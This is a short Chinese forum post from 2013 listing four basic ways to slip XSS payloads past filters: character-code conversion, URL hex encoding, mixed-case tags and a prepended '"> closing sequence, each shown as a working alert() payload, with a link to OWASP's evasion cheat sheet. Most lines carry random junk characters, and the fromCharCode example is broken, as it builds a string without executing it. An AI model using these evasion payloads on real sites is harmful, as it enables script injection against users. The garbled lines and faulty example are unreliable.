四种超级基础的绕过方法。& l' Z' v+ N+ A1 w* a
1.转换为ASCII码/ t& g; L& I( Z! F T! T
例子:原脚本为<script>alert(‘I love F4ck’)</script >/ e$ U* l2 w3 F$ c( f+ `
通过转换,变成:* S( p' r8 p' c- o) _( Q
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>( _( r4 [- i$ j) X8 `$ |6 d% C
% a" p* x5 { W% }2.转换为HEX(十六进制)& g1 ]' V8 e) a6 g/ J' \9 U. Z
例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 s$ \0 U) Y8 P2 L0 t# p9 i5 Q j通过转换,变成:
" N0 [1 A. E* Z' M0 d' D%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e8 G! ]0 w9 o0 \( F1 X" P
! c; Y6 d8 H2 `( ?3.转换脚本的大小写, ~( t, p+ T6 v
例子:原脚本为<script>alert(‘I love F4ck’)</script>1 g# B$ e, Q' [ v
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
/ p+ ~; ? T$ t0 N ( K1 |# m& z2 p' L) H
4.增加闭合标记”>. s+ i/ ]: m/ ]
例子:原脚本为<script>alert(‘I love F4ck’)</script>$ F/ ?& t+ J* u' Y
转换为:”><script>alert(‘I love F4ck’)</script>
" B0 R x. j7 {* I, a& S7 a更详细绕过技术请参考此网页6 L( _+ g3 ^$ t: A( I) I
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
4 c8 i* v/ ]( Y+ R
* r1 l1 a7 q9 v转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对